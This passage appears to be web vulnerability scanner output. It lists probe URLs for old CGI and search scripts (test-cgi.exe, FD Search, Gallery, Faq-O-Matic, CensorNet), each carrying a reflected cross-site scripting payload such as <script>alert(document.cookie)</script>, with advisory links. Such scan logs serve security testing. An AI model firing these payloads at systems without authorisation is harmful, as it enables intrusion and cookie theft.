- + /index.1.html/cgibin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgis/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/scripts/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-win/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/fcgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-exe/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-home/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-perl/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/scgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-bin-sdb/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/cgi-mod/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-9230: /index.1.html/cgi.cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/webcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-914/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-915/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/mpcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/ows-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-sys/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-local/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/htbin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgibin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgis/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/scripts/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-win/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/fcgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-exe/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-home/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-perl/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/scgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-bin-sdb/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-9230: /index.1.html/cgi-mod/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
- + OSVDB-2322: /index.1.html/cgi.cgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/webcgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-914/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-915/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/mpcgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/ows-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-sys/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-local/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/htbin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgibin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgis/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/scripts/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-win/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/fcgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-exe/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-home/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-perl/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/scgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-bin-sdb/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-2322: /index.1.html/cgi-mod/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
- + OSVDB-8661: /index.1.html/cgi.cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/webcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-914/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-915/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/mpcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/ows-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-sys/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-local/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/htbin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgibin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgis/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/scripts/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-win/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/fcgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-exe/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-home/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-perl/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/scgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-bin-sdb/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-8661: /index.1.html/cgi-mod/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
- + OSVDB-54110: /index.1.html/cgi.cgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/webcgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-914/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-915/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/mpcgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/ows-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-sys/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-local/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/htbin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgibin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgis/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/scripts/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-win/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/fcgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-exe/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-home/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-perl/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/scgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-bin-sdb/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54110: /index.1.html/cgi-mod/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi.cgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/webcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-914/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi-915/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2748: /index.1.html/cgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
